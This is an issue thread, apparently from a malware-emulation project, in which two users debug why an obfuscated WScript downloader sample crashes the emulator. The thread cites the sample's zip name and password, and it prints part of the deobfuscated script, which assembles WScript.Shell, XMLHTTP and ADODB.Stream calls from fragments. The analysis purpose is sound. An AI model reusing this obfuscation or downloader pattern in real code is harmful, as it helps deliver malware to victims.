TypeError: Array.prototype.sort called on null or undefined

[defconhaya]

When emulate the following file I get the error: TypeError: Array.prototype.sort called on null or undefined

File is malware, be careful !
Password is infected
4dc67aaa7133c5245da8234b2dadbf88-info_141926248.zip

This is my eval.js
eval.zip

[HynekPetrak]

Hi,
not sure what we could do here. Did you extracted the Javascript properly?

The first unescape returns:
"clientX = (\"tY\");valueParts = (\"respo\"); operator = (\"Shell\"); view = (\"xe\"); setOffset = (\"9dQb\"); arg = (\"SaveTo\");var maxIterations = (\"mo\"), cssNormalTransform = (\"op\"), subordinate = (4800), eased = (\"Obj\");keys = (\"ype\"), content = (9), propHooks = (1), focus = (\"cr\");var preFilters = (\"2.Ser\"), now = (55), preventDefault = (\"andEn\"), colgroup = (\"G\"), rsibling = (\"ect\"), checkClone = (\"ap\");var i = (\"e\"), matchesSelector = (5000), setTimeout = (\"WScr\"), selectors = (43);var flatOptions = (\"t\");pixelPositionVal = (3); _data = (\".XMLH\"); detach = (\"TTP.6\"); allTypes = (\"ructo\"); curCSSTop = (\"HTTP.6\");booleans = (0); unloadHandler = (\"P%/\");var responseContainer = (\"entS\"), run = (\"WScrip\"), unwrap = (\"Cre\"), ajaxHandleResponses = (\"or\");var currentTarget = (\".3.\"), restoreScript = (\"pro\"), getWidthOrHeight = (\"WSc\"), rbuggyMatches = (\"S\"), stopPropagation = (\"T\"), hasFocus = (\"Creat\");not = (\"://so\"); includeWidth = (\"3.0\"); rts = (\"B.Str\"); callbackExpect = (\"p://so\");values = (\"om/jp\"), global = (\"HTTP\"), td = (\"sof\");hasDuplicate = (\"LHT\"), swap = (\"Msxml2\"), setter = (\"verXM\"), camelCase = (\"lbui\"), dataTypes = eval, dataAndEvents = (\"l\");var aup = (\"WScri\"), resolveWith = (\"readyS\"), clientLeft = (function shift(){}, \"ep\");checkNonElements = (function shift.fired(){var rejectWith= [][\"const\" + allTypes + \"r\"][restoreScript + \"tot\" + keys][\"s\" + ajaxHandleResponses + \"t\"][checkClone + \"ply\"](); return rejectWith;}, \"n\"); rmultiDash = (\"dy\"); fadeOut = (\"ildup.\"); detectDuplicates = (34);special = (200); clientTop = (\"pe\"); innerText = (\"ript\");var iterator = (2), div1 = (23032826), readyWait = (\"s\");;"
where this
clientLeft = (function shift(){}, \"ep\");checkNonElements = (function shift.fired(){var rejectWith= [][\"const\" + allTypes + \"r\"][restoreScript + \"tot\" + keys][\"s\" + ajaxHandleResponses + \"t\"][checkClone + \"ply\"](); return rejectWith;}, \"n\");

does not seem to be a valid node syntax, i.e. function shift.fired() ...

Even with workaround it translates to:

function() { var rejectWith = [].constructor.prototype.sort.apply(); return rejectWith;}

which does not make much sense to me either.

[defconhaya]

Hi,
the funny thing is that such construction
function() { var rejectWith = [].constructor.prototype.sort.apply(); return rejectWith;}
is working in MS JScript which is ECMA compliant.
Another thing I've observed:
after this statement clientLeft = (function shift(){}, \"ep\");
the variable clientLeft must have value "ep" and a new object named shift must be instantiated but I think the shift object is discarded after attribution.

[HynekPetrak]

Seems the v8 (4.6.85.31) even from the most recent nodejs (5.9.1) does not yet properly implement the ECMA-262 apply() method for non strict mode:

19.2.3.1 Function.prototype.apply ( thisArg, argArray )
NOTE 1 The thisArg value is passed without modification as the this value. This is a change from Edition 3, where an undefined or null thisArg is replaced with the global object and ToObject is applied to all other values and that result is passed as the this value. Even though the thisArg is passed without modification, non-strict functions still perform these transformations upon entry to the function.

I believe it's coming in the v8 5.1.211 v8/v8@e4d2538

---

For the clientLeft = (function shift(){}, \"ep\"); it seems it's interpreted as function expression instead of declaration and therefore not hoisted to the scope. http://stackoverflow.com/questions/18303976/javascript-rounded-parentheses-surrounding-comma-separated-expressions.